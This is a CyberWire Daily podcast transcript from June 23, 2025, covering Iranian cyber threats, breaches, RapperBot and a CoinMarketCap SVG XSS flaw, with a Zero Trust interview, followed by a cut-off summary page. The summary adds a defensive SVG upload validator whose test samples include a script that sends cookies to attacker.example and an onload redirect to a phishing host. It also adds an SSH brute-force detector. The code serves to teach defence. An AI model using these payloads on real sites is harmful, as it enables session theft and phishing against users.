Maria Varmazis
You're listening to the Cyberwire network, powered by N2K.
Dave Bittner
Hey everybody, Dave here. I've talked about DeleteMe before and I'm still using it because it still works. It's been a few months now and I'm just as impressed today as I was when I signed up. DeleteMe keeps finding and removing my personal information from data broker sites, and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved knowing my privacy isn't something I have to worry about every day. The DeleteMe team handles everything. It's the set-it-and-forget-it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses, helping companies protect their employees' personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special 20% off your DeleteMe plan. Just go to JoinDeleteMe.com/N2K and use promo code N2K at checkout. That's JoinDeleteMe.com/N2K, code N2K.
Maria Varmazis
Risk of Iranian cyber attacks. Cyber warfare has become central to Israel and Iran's strategies. Oxford City Council discloses a data breach. Europe aims for digital sovereignty. A Michigan hospital network says data belonging to 740,000 was stolen by a ransomware gang. RapperBot pivots to attacking DVRs. A picture worth a thousand wallets. New Zealand's public sector bolsters cyber defenses. On our Industry Voices segment today, we are joined by Imran Umar, Zero Trust lead at Booz Allen Hamilton, discussing Zero Trust and Thunderdome. And a cyber attack spoils Russia's dairy flow.
Maria Varmazis
Today is Monday, June 23rd, 2025. I'm Maria Varmazis, host of the T-Minus Space Daily podcast, in for Dave Bittner, and this is your CyberWire Intel Briefing. Thanks for joining me this Monday. Let's get into it. The U.S. Department of Homeland Security has warned of a heightened risk of Iranian cyber attacks following American military strikes against Iran's nuclear facilities. DHS said in a National Terrorism Advisory System bulletin issued yesterday that low-level cyber attacks against U.S. networks by pro-Iranian hacktivists are likely, and cyber actors affiliated with the Iranian government may conduct attacks against U.S. networks. The advisory added that both hacktivists and Iranian government-affiliated actors routinely target poorly secured U.S. networks and internet-connected devices for disruptive cyber attacks. John Hultquist, who is the chief analyst at Google Threat Intelligence Group, noted that Iran has had mixed results with disruptive cyber attacks and they frequently fabricate and exaggerate their efforts in an effort to boost their psychological impact. We should be careful not to overestimate these incidents and inadvertently assist the actors. The impacts, he says, may still be serious for individual enterprises, which can prepare by taking many of the same steps that they would to prevent ransomware. In the wake of escalating tensions between Israel and Iran, cyberspace has emerged as a critical battleground. Israel-linked hackers have reportedly exfiltrated over $90 million from Iran's Bank Sepah and the Nobitex exchange, highlighting vulnerabilities in financial systems during conflict. On the other hand, Iran has retaliated by imposing nationwide internet blackouts, severely disrupting civilian access and communications. Cyber attacks from Iranian actors, both state-linked and hacktivist, are targeting critical infrastructure across Israel and potentially the United States, with water systems and industrial control environments particularly at risk.
Iran's asymmetric cyber strategy leans on disinformation, psychological operations and surveillance via compromised digital devices. Meanwhile, U.S. agencies like CISA are urging heightened cyber vigilance and resilience. This conflict underscores the growing use of cyber as both a standalone and complementary theater in modern warfare, where attacks on infrastructure, finance and information can have real-world consequences far beyond the battlefield. The Oxford City Council, which is the local government authority for the English city of Oxford, has disclosed a data breach affecting personal information across the past two decades. The council stated: "We have now identified that people who worked on Oxford City Council administered elections between 2001 and 2022, including poll station workers and ballot counters, may have had some personal details accessed." The majority of these people will be current or former council officers. The council detected an "unauthorized presence" within its network over the weekend of June 7, the statement adds. Investigations continue to identify, as precisely as we can, what was accessed and what, if anything, might have been taken out of our systems. There is no evidence of a mass download or extraction of data. Europe is accelerating efforts to achieve digital sovereignty amid growing unease over United States tech giants' alignment with the Trump administration. EU leaders are pushing for stronger data localization, stricter regulations on cloud services and enhanced protections for European digital infrastructure. The concern is that American platforms may prioritize U.S. political interests, potentially compromising European data autonomy and cybersecurity. This shift comes as U.S. firms ramp up lobbying and infrastructure investment in Europe even as the transatlantic regulatory divide deepens.
Cybersecurity experts see this as a critical juncture for Europe's long-term control over its digital landscape and threat resilience. Michigan hospital network McLaren Healthcare says information belonging to more than 740,000 people was stolen during a ransomware attack last August, according to The Record. The affected data included names, Social Security numbers, driver's license numbers, medical data and health insurance information. McLaren operates 13 hospitals and various medical services across the state of Michigan, and the attack disrupted services at the time. The INC Ransomware gang is believed to be responsible for the attack. RapperBot, which is a Mirai-based botnet known for targeting IoT devices, has pivoted towards attacking digital video recorders, or DVRs, using command injection exploits. The campaign exploits known vulnerabilities in DVR firmware, enabling attackers to execute remote commands and co-opt devices into a growing botnet. This shift marks an evolution in RapperBot's capabilities, signaling an expanded focus on industrial and surveillance hardware often left unpatched. Researchers report sustained scanning activity and brute force attacks targeting specific DVR brands. The botnet's modular structure and adaptability make it a persistent threat, especially to organizations with unsecured or outdated embedded devices on their networks. A critical vulnerability was discovered in CoinMarketCap's Doodle image upload feature that could have allowed attackers to execute arbitrary JavaScript in users' browsers, and this is an example of a stored cross-site scripting flaw. Security researchers found that malicious payloads embedded in SVG images could bypass existing sanitization filters. If exploited, attackers could hijack sessions, steal credentials or redirect users to phishing sites.
CoinMarketCap has since patched this vulnerability, but the incident highlights ongoing risks in user-generated content features and the importance of rigorous input validation. It also underscores the security challenges facing crypto-related platforms with large, highly targeted user bases. New Zealand's National Cyber Security Centre has mandated a Minimum Cybersecurity Standard, or MCSS, for all public sector agencies, with an implementation deadline set for October 2025. The MCSS includes 19 baseline controls covering areas like asset management, secure configuration, access controls and incident response. It aims to establish a consistent cybersecurity posture across government entities, emphasizing risk-informed practices and resilience. Agencies must report compliance progress and demonstrate measurable security outcomes. The move follows increasing concerns about advanced persistent threats targeting public infrastructure, reinforcing the government's commitment to baseline hardening and coordinated defense in an evolving threat landscape. Coming up next on our Industry Voices segment, host Dave Bittner sits down with Booz Allen Hamilton's Zero Trust lead Imran Umar to talk about Zero Trust and Thunderdome. Plus, a cyber attack brings Russia's dairy supply to a standstill. Stick around.
Dave Bittner
And now a word from our sponsor, ThreatLocker. Keeping your system secure shouldn't mean constantly reacting to threats. ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment. If it's not approved, it doesn't run. Simple as that. It's a way to stop ransomware and other attacks before they start without adding extra complexity to your day. See how ThreatLocker can help you lock down your environment at www.threatlocker.com. Compliance regulations, third-party risk, and customer security demands are all growing. Is your manual GRC program actually slowing you down? If you've ever found yourself drowning in spreadsheets, chasing down screenshots, or wrangling manual processes just to keep your GRC program on track, you're not alone. But let's be clear, there is a better way. Vanta's trust management platform takes the headache out of governance, risk and compliance. It automates the essentials, from internal and third-party risk to consumer trust, making your security posture stronger, yes, even helping to drive revenue. And this isn't just nice to have. According to a recent analysis from IDC, teams using Vanta saw a 129% boost in productivity. That's not a typo, that's real impact. So if you're ready to trade in chaos for clarity, check out Vanta and bring some serious efficiency to your GRC game. Vanta GRC: how much easier trust can be. Get started at vanta.com/cyber.
Maria Varmazis
On our Industry Voices segment, Dave Bittner recently spoke with Booz Allen Hamilton's Zero Trust lead Imran Umar about Zero Trust and Thunderdome. Here's their conversation.
Imran Umar
So Zero Trust has definitely evolved. The focus over the last several years has been on enterprise IT. So how do I get my enterprise IT network moved to a Zero Trust framework? What we are starting to see now is an emphasis on how the same Zero Trust concept can now be applied to weapon systems and to operational technology. Think of ICS data systems. So how do we take the same concept? Because our adversaries are not only attacking our IT systems, but they're attacking critical infrastructure. They're always on the lookout to penetrate our weapon systems. So how do we take the same concept of Zero Trust, the same framework, the same principles that we are starting to apply on enterprise IT networks? How are we now scaling that and deploying that for OT and weapon systems? That does require us to tailor these capabilities, because the same set of Zero Trust activities that are relevant for enterprise IT systems may not necessarily be relevant for OT and weapon systems. The DoD CIO and others, in collaboration with companies like Booz Allen, we are providing insights and input into what a Zero Trust framework should look like for other domains like weapon systems and tactical and OT.
Dave Bittner
Well, I definitely want to talk about those challenges of implementing zero trust within the DoD, but before we get there, again, staying a little broader, what are some of the big challenges that organizations face these days when it comes to implementing zero trust?
Imran Umar
Yeah, it's a great question. I mean, the biggest challenge that you're seeing is, you know, most organizations originally, when they got the mandate to start implementing zero trust or they got the requirements, they started doing a maturity assessment. And the assessment is really critical because it tells you where are you in your maturity state across the different pillars, like user, like identity, like data. From there they start building the roadmap and implementation plan. While users have had success across the user pillar, the device pillar, the visibility pillar, a lot of them are struggling with the data pillar. The data pillar continues to be the most elusive, the most challenging. And it's not necessarily a technology problem, it's not a technical problem that most people are running into. The problem is more around governance policies, the standards to which we are going to be tagging and labeling data, having proper attributes to be able to share that data with customers that are actually able to receive that data. So the biggest challenge really, I would say in the summary, is the data pillar.
Dave Bittner
Well, I mean, digging into some of the DoD challenges here. As you alluded to things like weapon systems and OT environments, what are some of the specifics of those needs that can be challenging for implementing zero trust?
Imran Umar
Yeah, if you take a look at OT systems, a lot of our critical infrastructure is very legacy and those systems are extremely vulnerable. And to do modernization across those systems will be very expensive and it will take a large amount of time. So one of the things we are proposing is essentially coming in and basically stopping the bleeding. Right. How do we protect critical assets? How do we stop intrusions into those systems, the legacy systems that are already in place? One of the biggest issues we're running into is because there's more OT and IT integration of these systems, we are opening up new vulnerabilities. So our recommendation has been that for OT systems, you go in, conduct a similar ZT assessment. For OT systems, Booz Allen has built a very robust OT assessment, just like we've done for enterprise IT systems. Apply that and essentially identify your biggest gaps. And most of the gaps, most of the issues that we generally see are, for example, if you're doing upgrades of OT systems, the potential of leaving backdoors open to vendors or third-party suppliers and then an adversary using those backdoors to basically access the OT environment and compromising them. So those could be easily addressed with a lot of the Zero Trust capabilities that we're deploying today.
Dave Bittner
One of the things that I've heard folks talking about in the DoD space is this Thunderdome solution for folks who aren't familiar with it. Can you describe that for us?
Imran Umar
Absolutely. So Thunderdome is the DISA and DoD Zero Trust solution. So it started off as a small pilot. DISA asked us to implement the, it was competitively awarded to Booz Allen and we were down-selected as part of this award, and they asked us to deploy a small instance of Thunderdome, a Zero Trust solution for DISA at a specific location. Since then, we have scaled Thunderdome across multiple different DoD mission partners. It provides the most advanced Zero Trust solution. It basically meets the 152 advanced activities outlined by DoD CIO. So Thunderdome is the marquee Zero Trust solution that's available to the entire Department of Defense. It's a very open architecture, it's a very modular architecture, so products and solutions can be swapped. Thunderdome can also be deployed not only on your unclassified network, but also your classified network. That's what we have deployed today for a lot of our customers. Thunderdome also provides the ability for customers to be able to tailor solutions for different environments. So if somebody wanted to deploy Thunderdome capabilities not just at the enterprise level, but at the tactical level or DDIL disconnected environment, we have proven that Thunderdome can be deployed across all those different domains.
Dave Bittner
You mentioned that Thunderdome makes or takes advantage of open architecture and a modular approach. What are the specific advantages to coming at the problem with those sorts of capabilities?
Imran Umar
Yeah, DoD is a very complex environment. You know, a lot of customers that we see have existing technical stacks that they have spent resources on. So rip and replace, sometimes it's not the answer. So what we have done with Thunderdome is we come in and conduct a rapid Zero Trust assessment for customers. We are, for example, working with a lot of COCOMs right now, and Fourth Estate agencies. We come in and start conducting a ZT assessment. We take a look at an existing environment, we build an architecture based on Thunderdome principles, which is, you know, the proven architecture, and we basically walk them through as to which capabilities from Thunderdome they can adopt, which capabilities they already have in place and how those capabilities can connect into Thunderdome. One of the beauties of Thunderdome is it's a multi-tenant solution. You build it once and reuse it. So when we're talking about efficiency and scalability, we have the ability to bring customers onto the Thunderdome solution and provide them the ability to manage it themselves if they choose to. If they want that service to be fully managed by DISA, that's also an option. So the multi-tenant architecture, the open architecture, has been extremely, extremely helpful for us to scale Thunderdome.
Dave Bittner
Help me understand how folks go about dialing this sort of thing in. I mean, everyone's situation is different. Is Thunderdome, it sounds to me like it's not an all-or-nothing situation here. Like you're able to kind of pick and choose what things best fit with your specific environment.
Imran Umar
Absolutely. You nailed it. Absolutely. So Thunderdome is very flexible, modular, and people have the ability to pick and choose capabilities. I'll give an example. We have customers, we have several COCOMs and Fourth Estate agencies that are immediately interested in our Zero Trust Edge solution. Our Zero Trust Edge solution is very robust, very scalable. It provides conditional access, micro-segmentation of user traffic and device traffic. A lot of the customers are very interested in the Zero Trust Edge solution. And we are able to go and deploy the Zero Trust Edge solution into their environment and integrate it into the existing fabric, integrate it into their identity solution, their endpoint security product, their IdP, their SIEM. Similar to that, we have other pieces of Thunderdome like the Zero Trust remote solution. We have a robust application security stack that protects application workloads. And finally we have a very robust visibility and analytics solution that supports providing enterprise-level visibility across all the Zero Trust infrastructure.
Dave Bittner
What are your recommendations for organizations who are just starting this Zero Trust journey? I mean, how can they get started without feeling overwhelmed?
Imran Umar
Yeah, I mean the deadline is coming, right? 2027 is the timeline, especially on the DoD side, for agencies to meet their target-level activities. So Thunderdome is a turnkey solution that they can adopt. It's very flexible, very cost efficient and, you know, it could be tailored to the customer need. So I mean I think number one we would recommend is Thunderdome is the easy button. Now for customers that do want to start from scratch, I think the first thing they need to do is conduct a Zero Trust assessment. So Booz Allen has this program called the Zero Trust Accelerator. The Zero Trust Accelerator program essentially comes in and conducts a deep assessment of the customer's solution. We take input like the customer's Zero Trust plan. If they have built a Zero Trust architecture, if they have capabilities in place today, we take all that as input, we plug all that data into our Zero Trust automated dashboard and it provides customers a good visual snapshot of where they are across the pillars, and then they can decide, hey, do I want to... I'm very mature, somewhat mature in the user pillar. I need to put resources towards the identity pillar, for example. So our accelerator program allows us to quickly provide customers a quick snapshot of where their gaps are. And we have done so many vendor AoA, analysis of alternatives, testing of so many different products, we can provide recommendations and build them or share with them existing blueprints as reference architectures that they can adopt. And then not only that, they can use the Thunderdome vehicle to actually task us to implement the solution for them. So the Thunderdome contract vehicle provides a lot of flexibility. You can adopt the turnkey solution or you can utilize the vehicle to do an accelerator assessment and deploy your tailored solution if that's what you desire.
Dave Bittner
So the organizations who are seeing success here, who are doing a good job implementing this, what are the common elements in their execution?
Imran Umar
I think the customers that are the most successful that we have seen from a Zero Trust perspective are customers that already have in place a robust identity solution, because everything kind of starts from identity, and have put the right governance around it. And then you can build things, you can build your data pillar, you can build your user inventory, your device inventory, you can build things like behavioral analytics, micro-segmentation. But the success we've seen with most customers is they already have a robust identity capability in place. And then all the other Zero Trust capabilities essentially integrate with those identity platforms and help accelerate their Zero Trust journey.
Dave Bittner
All right, well, I think I have everything I need for our story here. Is there anything that I missed, anything I haven't asked you that you think it's important to share?
Imran Umar
I think one gotcha that people may not be aware of as they kind of move towards this advanced Zero Trust is you're collecting a lot of data from a visibility perspective. Because one of the things that Zero Trust, what we're doing is we're doing real-time dynamic access. So we are looking at user device posture, we're looking at user identity, we're looking at behavioral analytics, we're looking at information in terms of what are they approved for, what systems and data are approved for access. Now all of a sudden you're collecting a lot of data. The traditional model, if you look at the visibility and analytics pillar, the traditional model has been take all that data and dump it into your SIEM, your security incident event management tool. Well, that model doesn't scale. That whole centralized model, where you take all the data from the edge, from the enterprise, and put it into a central location and go look for signals from a hunt perspective, it's not going to work. So one of the things we've built on Thunderdome is a distributed defense cyber operations architecture where the data stays where it is. We're not moving data around, but we have built a smart AI-driven data pipeline. And what we're doing is, as we're collecting this sensor data, we are transforming that data in line. So we're doing the data enrichment, we're doing the data transformation, we're doing data analytics, we're actually deploying AI models in line so they can detect threats, and we're really using our SIEM as our dashboard. So one thing customers do need to watch out for is they will be collecting a lot more logs. The traditional centralized DCO model will not work and they need to start moving towards a distributed DCO architecture.
Maria Varmazis
That was CyberWire host Dave Bittner speaking with Booz Allen Hamilton's Zero Trust lead, Imran Umar, about Zero Trust and Thunderdome.
Dave Bittner
Today's cyber attacks move fast. Your team needs to move faster. That's why CloudRange is redefining cyber readiness with real world AI driven cyber range simulations. Join CEO Debbie Gordon as she shares how organizations are replacing outdated tabletop exercises with live fire training that builds confidence and sharpens response in real time. It's not just training, it's transformation. Listen now and make sure your team is prepared for the threats ahead.
Maria Varmazis
And finally today, a cyber attack has thrown Russia's dairy industry into disarray after hackers brought down Mercury, which is the country's electronic veterinary certification system. It's the third strike on the platform this year alone, but it is easily the worst so far. With the system offline, producers scrambled to issue paper-based certificates, only to find that many retailers, including big names like Miratorg and Yandex Lavka, wouldn't accept them. And that's because under Russian law, businesses cannot legally handle animal products like milk, eggs or meat without digital documentation. Yeah. The result? A supply chain snarl, empty shelves and plenty of confusion. The dairy association Soyuzmoloko says unclear instructions from regulators aren't helping. Meanwhile, restoration work is underway, but with no timeline for full recovery and no culprit identified, the movement of milk remains on pause for now. For links to all of today's stories, check out our daily briefing at thecyberwire.com, and don't forget to check out the Grumpy Old Geeks podcast, where Dave contributes to a regular segment on Jason and Brian's show every week. And you can find Grumpy Old Geeks where all of the fine podcasts are listed. And that's the CyberWire. We would love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com. We're privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world's preeminent intelligence and law enforcement agencies. N2K makes it easy for companies to optimize your biggest investment: your people. We make you smarter about your teams while making your teams smarter.
Learn how at n2k.com. We're conducting our annual audience survey to learn more about our listeners, and we're collecting your insights until August 31st, 2025. There's a link for you in the show notes. N2K's senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. Mixed by Tré Hester, with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I'm Maria Varmazis in for Dave Bittner. Thanks for listening. We'll see you tomorrow.
Dave Bittner
Did you know Active Directory is targeted in 9 out of 10 cyber attacks? Once attackers get in, they can take control of your entire network. That's why Semperis created Purple Knight, the free security assessment tool that scans your Active Directory for hundreds of vulnerabilities and shows you how to fix them. Join thousands of IT pros using Purple Knight to stay ahead of threats. Download it now at semperis.com/purple-knight. That's semperis.com/purple-knight.
CyberWire Daily Summary: "Iran’s Digital Retaliation Looms" | June 23, 2025
Published on June 23, 2025, by N2K Networks
Hosted by Maria Varmazis, the CyberWire Daily podcast delivers essential cybersecurity news and expert analysis. In this episode, titled "Iran’s Digital Retaliation Looms," the discussion centers on the escalating cyber tensions between Iran and the United States, alongside other significant cybersecurity developments worldwide.
Risk of Iranian Cyber Attacks
Timestamp: 02:30
The U.S. Department of Homeland Security (DHS) has issued a stern warning regarding the increased likelihood of cyber attacks from Iranian actors in response to recent American military strikes on Iran's nuclear facilities. The DHS's National Terrorism Advisory System bulletin highlights:
Potential Targets: Both pro-Iranian hacktivists and government-affiliated cyber actors are expected to target U.S. networks, focusing on poorly secured systems and internet-connected devices.
Expert Insight: John Hultquist, Chief Analyst at Google Threat Intelligence Group, cautions, “Iran has had mixed results with disruptive cyber attacks, and they frequently fabricate and exaggerate their efforts to boost their psychological impact” (02:45).
Impact and Preparedness: While the psychological impact may be amplified, Hultquist emphasizes that the actual consequences could be severe for individual enterprises. Organizations are advised to implement standard ransomware prevention measures to bolster their defenses.
Cyber Warfare Central to Israel and Iran's Strategies
Timestamp: 04:00
Amidst rising tensions between Israel and Iran, cyberspace has become a pivotal battleground:
Israeli Cyber Operations: Israeli-linked hackers have reportedly siphoned over $90 million from Iran's Bank Sepah and the Nobitex exchange, exposing vulnerabilities within financial systems during conflicts.
Iranian Retaliation: In retaliation, Iran has enforced nationwide internet blackouts, significantly disrupting civilian communications and access.
Targeted Infrastructure: Iranian cyber actors are actively targeting critical infrastructure in Israel and potentially the United States, with particular focus on water systems and industrial control environments.
Asymmetric Cyber Strategy: Iran employs an asymmetric approach that leverages disinformation, psychological operations, and surveillance through compromised digital devices.
U.S. Response: Agencies like the Cybersecurity and Infrastructure Security Agency (CISA) are urging increased vigilance and resilience to counter these threats.
This cyber conflict underscores the evolving nature of warfare, where cyber attacks on infrastructure, finance, and information systems yield tangible real-world consequences beyond traditional battlefields.
Oxford City Council Data Breach
Timestamp: 05:30
The Oxford City Council in England has disclosed a significant data breach affecting personal information accumulated over two decades. Key points include:
Affected Individuals: Personnel involved in administering elections between 2001 and 2022, including poll station workers and ballot counters, may have had personal details accessed.
Council’s Statement: “We have now identified that people who worked on Oxford City Council administered elections between 2001 and 2022, including poll station workers and ballot counters, may have had some personal details accessed” (05:45).
Current Status: Investigations are ongoing to determine the extent of data accessed or extracted. Fortunately, there is no evidence of mass data downloads.
Europe's Push for Digital Sovereignty
Timestamp: 07:00
In response to concerns over U.S. tech giants' alignment with political interests, European Union leaders are intensifying efforts to achieve digital sovereignty by:
Data Localization: Implementing stricter regulations to ensure European data remains within regional borders.
Cloud Services Regulation: Enforcing more stringent controls over cloud service providers to safeguard European digital infrastructure.
Implications: This move aims to prevent American platforms from potentially prioritizing U.S. political agendas, thereby maintaining European data autonomy and cybersecurity integrity.
Michigan Hospital Network Ransomware Attack
Timestamp: 08:15
McLaren Healthcare, a Michigan hospital network, reported that a ransomware attack last August compromised data belonging to over 740,000 individuals. Details include:
Stolen Data: Names, Social Security numbers, driver's license numbers, medical data, and health insurance information.
Operational Impact: The attack caused significant disruptions to services across 13 hospitals and various medical services in Michigan.
Perpetrators: The Inc Ransomware gang is suspected to be behind the attack.
RapperBot's Evolution: Targeting DVRs
Timestamp: 09:00
RapperBot, a Mirai-based botnet initially known for compromising Internet of Things (IoT) devices through credential brute-forcing and command injection exploits, has expanded its focus to digital video recorders (DVRs):
New Targets: Exploits known firmware weaknesses in DVRs to execute commands remotely and enrol the devices in the botnet.
Threat Landscape: The shift signals an increased focus on industrial and surveillance hardware, which is often left unpatched and exposed to the Internet.
Research Findings: Continuous scanning and brute-force attempts against specific DVR brands show the botnet's persistence, particularly against organizations running outdated embedded devices.
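The scan-and-brute-force behaviour described above is visible in the login logs of the devices themselves. The detector below is an added example, not from the research summarized on this page. The log lines are constructed in OpenSSH's syslog format (the page does not say which service is brute-forced on each DVR model, so SSH is assumed here), and the threshold and window are illustrative.

```python
"""Flag brute-force bursts against an embedded device, and the login that follows one."""
from __future__ import annotations
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH auth lines as written to syslog (constructed format assumption).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse(line: str, year: int = 2025):
    """Return (timestamp, result, user, src) or None for lines we do not score."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return ts, m["result"], m["user"], m["src"]


def detect(lines, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Sliding-window brute-force detector keyed on source IP.

    Emits ('bruteforce', src, failures, distinct_users) when a source reaches
    `threshold` failures inside `window`, and ('success_after_bruteforce', src, user)
    when that same source later authenticates: treat the device as enrolled in
    the botnet until the credential is rotated and the box is re-imaged.
    """
    recent: dict[str, deque] = defaultdict(deque)  # src -> (ts, user) failures in window
    alerted: set[str] = set()
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ts, result, user, src = ev
        q = recent[src]
        while q and ts - q[0][0] > window:
            q.popleft()
        if result == "Failed":
            q.append((ts, user))
            if len(q) >= threshold and src not in alerted:
                alerted.add(src)
                alerts.append(("bruteforce", src, len(q), len({u for _, u in q})))
        elif src in alerted:
            alerts.append(("success_after_bruteforce", src, user))
    return alerts


# Constructed sample: one source sprays default-style usernames, then gets in;
# a second source is an ordinary operator who mistyped once.
SAMPLE_LOG = """\
Jun 23 10:01:02 dvr-lobby sshd[812]: Failed password for root from 203.0.113.7 port 51234 ssh2
Jun 23 10:01:03 dvr-lobby sshd[813]: Failed password for root from 203.0.113.7 port 51240 ssh2
Jun 23 10:01:03 dvr-lobby sshd[814]: Failed password for invalid user admin from 203.0.113.7 port 51241 ssh2
Jun 23 10:01:04 dvr-lobby sshd[815]: Failed password for invalid user admin from 203.0.113.7 port 51244 ssh2
Jun 23 10:01:05 dvr-lobby sshd[816]: Failed password for invalid user user from 203.0.113.7 port 51250 ssh2
Jun 23 10:01:09 dvr-lobby sshd[817]: Accepted password for root from 203.0.113.7 port 51260 ssh2
Jun 23 10:15:00 dvr-lobby sshd[900]: Failed password for ops from 198.51.100.4 port 40000 ssh2
Jun 23 10:15:30 dvr-lobby sshd[901]: Accepted password for ops from 198.51.100.4 port 40001 ssh2
Jun 23 10:16:00 dvr-lobby sshd[902]: pam_unix(sshd:session): session opened for user ops
"""


def run():
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

The second alert type is the one worth paging on: a burst of failures followed by an accepted login from the same address means the device's password was guessable, which is exactly the population of unpatched, default-credential hardware the botnet is harvesting.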
CoinMarketCap's Security Flaw
Timestamp: 10:15
A critical stored cross-site scripting (XSS) vulnerability was identified in CoinMarketCap's Doodle image upload feature, allowing attackers to execute arbitrary JavaScript in visitors' browsers:
Mechanism: Malicious SVG images bypassed the upload sanitization filters. Because SVG is XML and can carry script elements and event-handler attributes, a rendered file can hijack sessions, steal credentials, or redirect users to phishing sites.
Response: CoinMarketCap has patched the vulnerability. The incident highlights the ongoing security challenges faced by crypto platforms with large, heavily targeted user bases.
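To make the mechanism concrete, here is an added example (not CoinMarketCap's code) of an upload gate that only checks extension and declared type, beside a content check that rejects the SVG constructs that turn an "image" into a script vehicle. The sample files, the gate and the serving policy are constructed for illustration; a production deployment would also re-encode raster formats and serve user content from a separate origin.

```python
"""Vet an uploaded SVG for active content before storing it."""
from __future__ import annotations
import re
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
# Elements that run script or embed arbitrary HTML or remote documents.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
CSS_LOADS = re.compile(r"@import|url\s*\(", re.IGNORECASE)


def local_name(qualified: str) -> str:
    """'{namespace}tag' -> 'tag'."""
    return qualified.rsplit("}", 1)[-1]


def naive_accepts(filename: str, content_type: str) -> bool:
    """The weak gate: extension and declared MIME type only. An SVG carrying
    <script> passes it unchanged, which is the flaw class described above."""
    ok_ext = filename.lower().endswith((".png", ".jpg", ".jpeg", ".svg"))
    return ok_ext and content_type.lower().startswith("image/")


def svg_findings(data: bytes) -> list[str]:
    """Reasons to reject the SVG; an empty list means it passed."""
    if re.search(rb"<!(DOCTYPE|ENTITY)", data, re.IGNORECASE):
        return ["DTD/entity declarations not allowed"]  # also blocks entity-expansion DoS
    try:
        root = ET.fromstring(data)  # ElementTree does not resolve external entities
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if local_name(root.tag) != "svg":
        return [f"root element is <{local_name(root.tag)}>, not <svg>"]
    findings: list[str] = []
    for el in root.iter():
        name = local_name(el.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        if name == "style" and CSS_LOADS.search(el.text or ""):
            findings.append("<style> block loads external resources")
        if name in ("set", "animate") and el.get("attributeName", "") in ("href", "xlink:href"):
            findings.append(f"<{name}> rewrites an href at runtime")
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            elif attr in HREF_ATTRS and not value.strip().startswith("#"):
                findings.append(f"non-local href on <{name}>: {value.strip()[:40]}")
            elif aname == "style" and CSS_LOADS.search(value):
                findings.append(f"style attribute on <{name}> loads a URL")
    return findings


def hardened_accepts(filename: str, content_type: str, data: bytes) -> tuple[bool, list[str]]:
    """Extension/type gate plus content inspection for SVG."""
    if not naive_accepts(filename, content_type):
        return False, ["extension or content type not allowed"]
    if filename.lower().endswith(".svg") or content_type.lower().startswith("image/svg"):
        findings = svg_findings(data)
        return not findings, findings
    return True, []  # raster formats: re-encode through an image decoder instead (not shown)


def serving_headers() -> dict[str, str]:
    """Defense in depth for the stored file. Script in an SVG never runs when it is
    embedded via <img>, but it does when the file is opened directly or through
    <object>/<iframe>; these headers close that path even if a check is missed."""
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# Constructed samples: one benign doodle and three payload shapes.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="#0af"/></svg>'
SCRIPT = b'<svg xmlns="http://www.w3.org/2000/svg"><script>fetch("https://attacker.example/?c="+document.cookie)</script></svg>'
HANDLER = b'<svg xmlns="http://www.w3.org/2000/svg" onload="location=\'https://phish.example\'"><rect width="9" height="9"/></svg>'
XLINK = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
         b'<a xlink:href="javascript:alert(document.domain)"><text y="10">click</text></a></svg>')

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("script", SCRIPT), ("handler", HANDLER), ("xlink", XLINK)]:
        print(label, "naive:", naive_accepts("doodle.svg", "image/svg+xml"),
              "hardened:", hardened_accepts("doodle.svg", "image/svg+xml", blob))
```

All four samples pass the naive gate; only the benign one passes the content check. The deny-list is deliberately paired with the allow-only-fragment rule for href, since an attacker who cannot inject script can still exfiltrate via a remote image or stylesheet reference.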
New Zealand's Minimum CyberSecurity Standard (MCSS)
Timestamp: 11:30
New Zealand's National Cyber Security Centre (NCSC) has mandated the MCSS for all public sector agencies, with compliance required by October 2025. Key aspects include:
Baseline Controls: 19 controls covering asset management, secure configuration, access controls, and incident response.
Objectives: Establish a uniform cybersecurity stance across government entities, emphasizing risk-informed practices and resilience against advanced persistent threats targeting public infrastructure.
Implementation: Agencies must demonstrate progress and measurable security outcomes, reinforcing the government’s commitment to coordinated defense strategies.
Industry Voices: Zero Trust and Thunderdome
Timestamp: 12:45
In the Industry Voices segment, host Dave Bittner interviews Imran Umar, Zero Trust Lead at Booz Allen Hamilton, about the evolution of Zero Trust frameworks and the Thunderdome Zero Trust solution.
Zero Trust Framework Evolution
Timestamp: 12:56 - 15:34
Imran Umar elaborates on how Zero Trust has transitioned from focusing solely on Enterprise IT to encompassing weapon systems and operational technology (OT):
